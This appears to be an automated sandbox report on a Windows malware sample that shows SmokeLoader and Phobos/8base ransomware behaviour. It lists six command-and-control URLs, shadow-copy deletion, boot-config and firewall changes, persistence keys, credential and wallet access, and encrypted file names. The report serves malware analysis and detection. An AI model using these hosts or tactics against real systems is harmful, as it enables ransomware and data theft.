Analysis
-
max time kernel
150s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20230621-en -
resource tags
arch:x64arch:x86image:win10v2004-20230621-enlocale:en-usos:windows10-2004-x64system -
submitted
25-06-2023 10:24
Static task
static1
Behavioral task
behavioral1
Sample
e142f4e8eb3fb4323fb377138.exe
Resource
win7-20230621-en
Behavioral task
behavioral2
Sample
e142f4e8eb3fb4323fb377138.exe
Resource
win10v2004-20230621-en
General
-
Target
e142f4e8eb3fb4323fb377138.exe
-
Size
281KB
-
MD5
9769c181ecef69544bbb2f974b8c0e10
-
SHA1
5d0f447f4ccc89d7d79c0565372195240cdfa25f
-
SHA256
e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0
-
SHA512
b3da8fea6ee5d6b67f55a4043f18d7325f1700c9f3dcb0e7cbf21f49ebdbb56b5a10a2d03153d0dfb1e8dc34db20cdea0236c448f2c361fadbabf9a6f59b4c7a
-
SSDEEP
3072:Z5SXIMALRKEttgCWAbi1D1fJmxIV0BN3omE9MA5yXsztcJe9:GIMpEtCCWAbiBRmE9o6
Malware Config
Extracted
smokeloader
2022
http://serverlogs37.xyz/statweb255/
http://servblog757.xyz/statweb255/
http://dexblog45.xyz/statweb255/
http://admlogs.online/statweb255/
http://blogstat355.xyz/statweb255/
http://blogstatserv25.xyz/statweb255/
Signatures
-
Phobos
Phobos ransomware appeared at the beginning of 2019.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
Processes:
E4D8.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ E4D8.exe -
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 268 bcdedit.exe 996 bcdedit.exe -
Renames multiple (407) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 32 1284 powershell.exe -
Processes:
wbadmin.exepid process 2940 wbadmin.exe -
Downloads MZ/PE file
-
Modifies Windows Firewall 1 TTPs 2 IoCs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
E4D8.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion E4D8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion E4D8.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
E4D8.exeSRD.bat.exesv.bat.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\Control Panel\International\Geo\Nation E4D8.exe Key value queried \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\Control Panel\International\Geo\Nation SRD.bat.exe Key value queried \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\Control Panel\International\Geo\Nation sv.bat.exe -
Drops startup file 1 IoCs
Processes:
EA96.exedescription ioc process File created \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\EA96.exe EA96.exe -
Executes dropped EXE 13 IoCs
Processes:
D5D3.exeE4D8.exeE834.exeEA96.exeED76.exeEA96.exeE4D8.exeE4D8.exeE4D8.exeE4D8.exeSRD.bat.exesv.bat.exePublicKey.exepid process 4200 D5D3.exe 1168 E4D8.exe 1816 E834.exe 4480 EA96.exe 2424 ED76.exe 4812 EA96.exe 2956 E4D8.exe 4652 E4D8.exe 3748 E4D8.exe 2116 E4D8.exe 4312 SRD.bat.exe 5996 sv.bat.exe 280 PublicKey.exe -
Loads dropped DLL 1 IoCs
Processes:
E4D8.exepid process 1168 E4D8.exe -
Obfuscated with Agile.Net obfuscator 7 IoCs
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\E4D8.exe agile_net C:\Users\Admin\AppData\Local\Temp\E4D8.exe agile_net behavioral2/memory/1168-247-0x0000000000DB0000-0x000000000140E000-memory.dmp agile_net C:\Users\Admin\AppData\Local\Temp\E4D8.exe agile_net C:\Users\Admin\AppData\Local\Temp\E4D8.exe agile_net C:\Users\Admin\AppData\Local\Temp\E4D8.exe agile_net C:\Users\Admin\AppData\Local\Temp\E4D8.exe agile_net -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\96f8e3a4-623f-4526-afa7-8c7592f60c75\AgileDotNetRT.dll themida C:\Users\Admin\AppData\Local\Temp\96f8e3a4-623f-4526-afa7-8c7592f60c75\AgileDotNetRT.dll themida behavioral2/memory/1168-286-0x0000000071E80000-0x0000000072460000-memory.dmp themida behavioral2/memory/1168-1308-0x0000000071E80000-0x0000000072460000-memory.dmp themida -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
explorer.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe Key opened \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe Key opened \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 4 IoCs
Processes:
PublicKey.exeEA96.exeD5D3.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Riqyrsb = "C:\\Users\\Admin\\AppData\\Roaming\\Riqyrsb.exe" PublicKey.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\EA96 = "C:\\Users\\Admin\\AppData\\Local\\EA96.exe" EA96.exe Set value (str) \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\EA96 = "C:\\Users\\Admin\\AppData\\Local\\EA96.exe" EA96.exe Set value (str) \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Riqyrsb = "C:\\Users\\Admin\\AppData\\Roaming\\Riqyrsb.exe" D5D3.exe -
Processes:
E4D8.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA E4D8.exe -
Drops desktop.ini file(s) 5 IoCs
Processes:
EA96.exedescription ioc process File opened for modification C:\Program Files (x86)\desktop.ini EA96.exe File opened for modification C:\$Recycle.Bin\S-1-5-21-922299981-3641064733-3870770889-1000\desktop.ini EA96.exe File opened for modification F:\$RECYCLE.BIN\S-1-5-21-922299981-3641064733-3870770889-1000\desktop.ini EA96.exe File opened for modification C:\Program Files\desktop.ini EA96.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI EA96.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 21 IoCs
Processes:
powershell.exepid process 1284 powershell.exe 1284 powershell.exe 1284 powershell.exe 1284 powershell.exe 1284 powershell.exe 1284 powershell.exe 1284 powershell.exe 1284 powershell.exe 1284 powershell.exe 1284 powershell.exe 1284 powershell.exe 1284 powershell.exe 1284 powershell.exe 1284 powershell.exe 1284 powershell.exe 1284 powershell.exe 1284 powershell.exe 1284 powershell.exe 1284 powershell.exe 1284 powershell.exe 1284 powershell.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
e142f4e8eb3fb4323fb377138.exeE4D8.exepowershell.exedescription pid process target process PID 1960 set thread context of 3656 1960 e142f4e8eb3fb4323fb377138.exe e142f4e8eb3fb4323fb377138.exe PID 1168 set thread context of 2116 1168 E4D8.exe E4D8.exe PID 1284 set thread context of 5896 1284 powershell.exe aspnet_compiler.exe -
Drops file in Program Files directory 64 IoCs
Processes:
EA96.exedescription ioc process File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_neutral_split.scale-100_8wekyb3d8bbwe\AppxManifest.xml EA96.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-core-multiview.xml.id[2A5E155A-3483].[[email protected]].8base EA96.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\AppPackageLargeTile.scale-125.png EA96.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-24_altform-unplated_contrast-white.png EA96.exe File created C:\Program Files\VideoLAN\VLC\locale\br\LC_MESSAGES\vlc.mo.id[2A5E155A-3483].[[email protected]].8base EA96.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Search.api.id[2A5E155A-3483].[[email protected]].8base EA96.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ui-strings.js EA96.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Trust Protection Lists\Mu\Entities EA96.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\th_get.svg EA96.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ClickToRun\vccorlib140.dll EA96.exe File opened for modification C:\Program Files\InstallRedo.jtx EA96.exe File created C:\Program Files\VideoLAN\VLC\plugins\stream_out\libstream_out_duplicate_plugin.dll.id[2A5E155A-3483].[[email protected]].8base EA96.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-72_contrast-white.png EA96.exe File created C:\Program Files\Microsoft Office\root\Office16\ADDINS\EduWorks Data Streamer Add-In\MicrosoftDataStreamerforExcel.vsto.id[2A5E155A-3483].[[email protected]].8base EA96.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\Assets\PhotosAppList.contrast-white_targetsize-96.png EA96.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeStudent2019R_OEM_Perp-ul-oob.xrm-ms EA96.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteSplashLogo.scale-250.png EA96.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Work\contrast-white\WideTile.scale-100.png EA96.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Trust Protection Lists\Sigma\Entities EA96.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ClickToRun\FrequentOfficeUpdateSchedule.xml EA96.exe File created C:\Program Files\VideoLAN\VLC\locale\be\LC_MESSAGES\vlc.mo.id[2A5E155A-3483].[[email protected]].8base EA96.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe\Assets\InsiderHubAppList.targetsize-80_altform-unplated_contrast-black.png EA96.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Home\RTL\contrast-white\SmallTile.scale-200.png EA96.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\larrow.gif.id[2A5E155A-3483].[[email protected]].8base EA96.exe File created C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessPipcDemoR_BypassTrial365-ppd.xrm-ms.id[2A5E155A-3483].[[email protected]].8base EA96.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\1033\GrooveIntlResource.dll.id[2A5E155A-3483].[[email protected]].8base EA96.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\extensions\VLSub.luac EA96.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.8204.0_x64__8wekyb3d8bbwe\Win10\MicrosoftSolitaireAppList.targetsize-16_altform-unplated.png EA96.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\review_shared.gif.id[2A5E155A-3483].[[email protected]].8base EA96.exe File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\VisualElements\LogoDev.png EA96.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.apache.lucene.analysis_3.5.0.v20120725-1805.jar EA96.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_OEM_Perp-ppd.xrm-ms EA96.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\SETLANG_K_COL.HXK EA96.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_ellipses_selected.svg EA96.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\root\ui-strings.js EA96.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_Trial2-ppd.xrm-ms EA96.exe File created C:\Program Files\VideoLAN\VLC\skins\winamp2.xml.id[2A5E155A-3483].[[email protected]].8base EA96.exe File created C:\Program Files\Common Files\microsoft shared\ClickToRun\C2RINTL.bg-bg.dll.id[2A5E155A-3483].[[email protected]].8base EA96.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\nb-no\ui-strings.js.id[2A5E155A-3483].[[email protected]].8base EA96.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\css\main.css EA96.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\themes\dark\adobe_logo.png.id[2A5E155A-3483].[[email protected]].8base EA96.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\WORD_WHATSNEW.XML EA96.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected] EA96.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-36_altform-lightunplated.png EA96.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\LinkedInboxSmallTile.scale-100.png EA96.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\Cartridges\as80.xsl.id[2A5E155A-3483].[[email protected]].8base EA96.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\codec\libmft_plugin.dll EA96.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\PointerIndicatorPixelShader.cso EA96.exe File created C:\Program Files\Common Files\microsoft shared\ClickToRun\api-ms-win-crt-private-l1-1-0.dll.id[2A5E155A-3483].[[email protected]].8base EA96.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL022.XML EA96.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\MedTile.scale-125.png EA96.exe File opened for modification C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation\1.0.1\Test\Modules\Example2.Diagnostics\1.0.1\Example2.Diagnostics.psd1 EA96.exe File created C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Exchange.WebServices.dll.id[2A5E155A-3483].[[email protected]].8base EA96.exe File created C:\Program Files\Microsoft Office\root\Office16\ADDINS\PowerPivot Excel Add-in\Cartridges\trdtv2r41.xsl.id[2A5E155A-3483].[[email protected]].8base EA96.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppPackageAppList.targetsize-48_contrast-black.png EA96.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\arrow-up-pressed.gif EA96.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxA-Google.scale-250.png EA96.exe File created C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_Subscription4-pl.xrm-ms.id[2A5E155A-3483].[[email protected]].8base EA96.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.36.151\goopdateres_sv.dll EA96.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\eml.scale-48.png EA96.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\nl-nl\ui-strings.js.id[2A5E155A-3483].[[email protected]].8base EA96.exe File created C:\Program Files\Microsoft Office\root\Licenses16\Publisher2019VL_KMS_Client_AE-ppd.xrm-ms.id[2A5E155A-3483].[[email protected]].8base EA96.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_x64__8wekyb3d8bbwe\Assets\EnsoUI\id_arrow_black.png EA96.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_x64__8wekyb3d8bbwe\Assets\Icons\icon_play_prs.png EA96.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 3148 4812 WerFault.exe EA96.exe -
Checks SCSI registry key(s) 3 TTPs 7 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
vds.exee142f4e8eb3fb4323fb377138.exedescription ioc process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI e142f4e8eb3fb4323fb377138.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI e142f4e8eb3fb4323fb377138.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI e142f4e8eb3fb4323fb377138.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 4680 vssadmin.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
e142f4e8eb3fb4323fb377138.exepid process 3656 e142f4e8eb3fb4323fb377138.exe 3656 e142f4e8eb3fb4323fb377138.exe 2636 2636 2636 2636 2636 2636 2636 2636 2636 2636 2636 2636 2636 2636 2636 2636 2636 2636 2636 2636 2636 2636 2636 2636 2636 2636 2636 2636 2636 2636 2636 2636 2636 2636 2636 2636 2636 2636 2636 2636 2636 2636 2636 2636 2636 2636 2636 2636 2636 2636 2636 2636 2636 2636 2636 2636 2636 2636 2636 2636 2636 2636 -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 2636 -
Suspicious behavior: MapViewOfSection 31 IoCs
Processes:
e142f4e8eb3fb4323fb377138.exepid process 3656 e142f4e8eb3fb4323fb377138.exe 2636 2636 2636 2636 2636 2636 2636 2636 2636 2636 2636 2636 2636 2636 2636 2636 2636 2636 2636 2636 2636 2636 2636 2636 2636 2636 2636 2636 2636 2636 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exeEA96.exevssvc.exeD5D3.exeWMIC.exewbengine.exeE4D8.exedescription pid process Token: SeShutdownPrivilege 2636 Token: SeCreatePagefilePrivilege 2636 Token: SeDebugPrivilege 1284 powershell.exe Token: SeShutdownPrivilege 2636 Token: SeCreatePagefilePrivilege 2636 Token: SeDebugPrivilege 4480 EA96.exe Token: SeBackupPrivilege 4816 vssvc.exe Token: SeRestorePrivilege 4816 vssvc.exe Token: SeAuditPrivilege 4816 vssvc.exe Token: SeShutdownPrivilege 2636 Token: SeCreatePagefilePrivilege 2636 Token: SeDebugPrivilege 4200 D5D3.exe Token: SeIncreaseQuotaPrivilege 2924 WMIC.exe Token: SeSecurityPrivilege 2924 WMIC.exe Token: SeTakeOwnershipPrivilege 2924 WMIC.exe Token: SeLoadDriverPrivilege 2924 WMIC.exe Token: SeSystemProfilePrivilege 2924 WMIC.exe Token: SeSystemtimePrivilege 2924 WMIC.exe Token: SeProfSingleProcessPrivilege 2924 WMIC.exe Token: SeIncBasePriorityPrivilege 2924 WMIC.exe Token: SeCreatePagefilePrivilege 2924 WMIC.exe Token: SeBackupPrivilege 2924 WMIC.exe Token: SeRestorePrivilege 2924 WMIC.exe Token: SeShutdownPrivilege 2924 WMIC.exe Token: SeDebugPrivilege 2924 WMIC.exe Token: SeSystemEnvironmentPrivilege 2924 WMIC.exe Token: SeRemoteShutdownPrivilege 2924 WMIC.exe Token: SeUndockPrivilege 2924 WMIC.exe Token: SeManageVolumePrivilege 2924 WMIC.exe Token: 33 2924 WMIC.exe Token: 34 2924 WMIC.exe Token: 35 2924 WMIC.exe Token: 36 2924 WMIC.exe Token: SeIncreaseQuotaPrivilege 2924 WMIC.exe Token: SeSecurityPrivilege 2924 WMIC.exe Token: SeTakeOwnershipPrivilege 2924 WMIC.exe Token: SeLoadDriverPrivilege 2924 WMIC.exe Token: SeSystemProfilePrivilege 2924 WMIC.exe Token: SeSystemtimePrivilege 2924 WMIC.exe Token: SeProfSingleProcessPrivilege 2924 WMIC.exe Token: SeIncBasePriorityPrivilege 2924 WMIC.exe Token: SeCreatePagefilePrivilege 2924 WMIC.exe Token: SeBackupPrivilege 2924 WMIC.exe Token: SeRestorePrivilege 2924 WMIC.exe Token: SeShutdownPrivilege 2924 WMIC.exe Token: SeDebugPrivilege 2924 WMIC.exe Token: SeSystemEnvironmentPrivilege 2924 WMIC.exe Token: SeRemoteShutdownPrivilege 2924 WMIC.exe Token: SeUndockPrivilege 2924 WMIC.exe Token: SeManageVolumePrivilege 2924 WMIC.exe Token: 33 2924 WMIC.exe Token: 34 2924 WMIC.exe Token: 35 2924 WMIC.exe Token: 36 2924 WMIC.exe Token: SeBackupPrivilege 4592 wbengine.exe Token: SeRestorePrivilege 4592 wbengine.exe Token: SeSecurityPrivilege 4592 wbengine.exe Token: SeShutdownPrivilege 2636 Token: SeCreatePagefilePrivilege 2636 Token: SeShutdownPrivilege 1284 powershell.exe Token: SeCreatePagefilePrivilege 1284 powershell.exe Token: SeDebugPrivilege 1168 E4D8.exe Token: SeShutdownPrivilege 2636 Token: SeCreatePagefilePrivilege 2636 -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
e142f4e8eb3fb4323fb377138.exeE834.exeEA96.execmd.execmd.exedescription pid process target process PID 1960 wrote to memory of 3656 1960 e142f4e8eb3fb4323fb377138.exe e142f4e8eb3fb4323fb377138.exe PID 1960 wrote to memory of 3656 1960 e142f4e8eb3fb4323fb377138.exe e142f4e8eb3fb4323fb377138.exe PID 1960 wrote to memory of 3656 1960 e142f4e8eb3fb4323fb377138.exe e142f4e8eb3fb4323fb377138.exe PID 1960 wrote to memory of 3656 1960 e142f4e8eb3fb4323fb377138.exe e142f4e8eb3fb4323fb377138.exe PID 1960 wrote to memory of 3656 1960 e142f4e8eb3fb4323fb377138.exe e142f4e8eb3fb4323fb377138.exe PID 1960 wrote to memory of 3656 1960 e142f4e8eb3fb4323fb377138.exe e142f4e8eb3fb4323fb377138.exe PID 2636 wrote to memory of 4200 2636 D5D3.exe PID 2636 wrote to memory of 4200 2636 D5D3.exe PID 2636 wrote to memory of 1168 2636 E4D8.exe PID 2636 wrote to memory of 1168 2636 E4D8.exe PID 2636 wrote to memory of 1168 2636 E4D8.exe PID 2636 wrote to memory of 1816 2636 E834.exe PID 2636 wrote to memory of 1816 2636 E834.exe PID 2636 wrote to memory of 1816 2636 E834.exe PID 2636 wrote to memory of 4480 2636 EA96.exe PID 2636 wrote to memory of 4480 2636 EA96.exe PID 2636 wrote to memory of 4480 2636 EA96.exe PID 2636 wrote to memory of 2424 2636 ED76.exe PID 2636 wrote to memory of 2424 2636 ED76.exe PID 2636 wrote to memory of 2424 2636 ED76.exe PID 2636 wrote to memory of 4552 2636 explorer.exe PID 2636 wrote to memory of 4552 2636 explorer.exe PID 2636 wrote to memory of 4552 2636 explorer.exe PID 2636 wrote to memory of 4552 2636 explorer.exe PID 1816 wrote to memory of 1284 1816 E834.exe powershell.exe PID 1816 wrote to memory of 1284 1816 E834.exe powershell.exe PID 1816 wrote to memory of 1284 1816 E834.exe powershell.exe PID 2636 wrote to memory of 1668 2636 explorer.exe PID 2636 wrote to memory of 1668 2636 explorer.exe PID 2636 wrote to memory of 1668 2636 explorer.exe PID 2636 wrote to memory of 452 2636 explorer.exe PID 2636 wrote to memory of 452 2636 explorer.exe PID 2636 wrote to memory of 452 2636 explorer.exe PID 2636 wrote to memory of 452 2636 explorer.exe PID 2636 wrote to memory of 1164 2636 explorer.exe PID 2636 wrote to memory of 1164 2636 explorer.exe PID 2636 wrote to memory of 1164 2636 explorer.exe PID 2636 wrote to memory of 1164 2636 explorer.exe PID 2636 wrote to memory of 2324 2636 explorer.exe PID 2636 wrote to memory of 2324 2636 explorer.exe PID 2636 wrote to memory of 2324 2636 explorer.exe PID 2636 wrote to memory of 2324 2636 explorer.exe PID 2636 wrote to memory of 2056 2636 explorer.exe PID 2636 wrote to memory of 2056 2636 explorer.exe PID 2636 wrote to memory of 2056 2636 explorer.exe PID 2636 wrote to memory of 1248 2636 explorer.exe PID 2636 wrote to memory of 1248 2636 explorer.exe PID 2636 wrote to memory of 1248 2636 explorer.exe PID 2636 wrote to memory of 1248 2636 explorer.exe PID 4480 wrote to memory of 1204 4480 EA96.exe cmd.exe PID 4480 wrote to memory of 1204 4480 EA96.exe cmd.exe PID 4480 wrote to memory of 4548 4480 EA96.exe cmd.exe PID 4480 wrote to memory of 4548 4480 EA96.exe cmd.exe PID 2636 wrote to memory of 4476 2636 explorer.exe PID 2636 wrote to memory of 4476 2636 explorer.exe PID 2636 wrote to memory of 4476 2636 explorer.exe PID 2636 wrote to memory of 1036 2636 explorer.exe PID 2636 wrote to memory of 1036 2636 explorer.exe PID 2636 wrote to memory of 1036 2636 explorer.exe PID 2636 wrote to memory of 1036 2636 explorer.exe PID 4548 wrote to memory of 4376 4548 cmd.exe netsh.exe PID 4548 wrote to memory of 4376 4548 cmd.exe netsh.exe PID 1204 wrote to memory of 4680 1204 cmd.exe vssadmin.exe PID 1204 wrote to memory of 4680 1204 cmd.exe vssadmin.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
outlook_office_path 1 IoCs
Processes:
explorer.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe -
outlook_win_path 1 IoCs
Processes:
explorer.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138.exe"C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1960 -
C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138.exe"C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138.exe"2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:3656
-
-
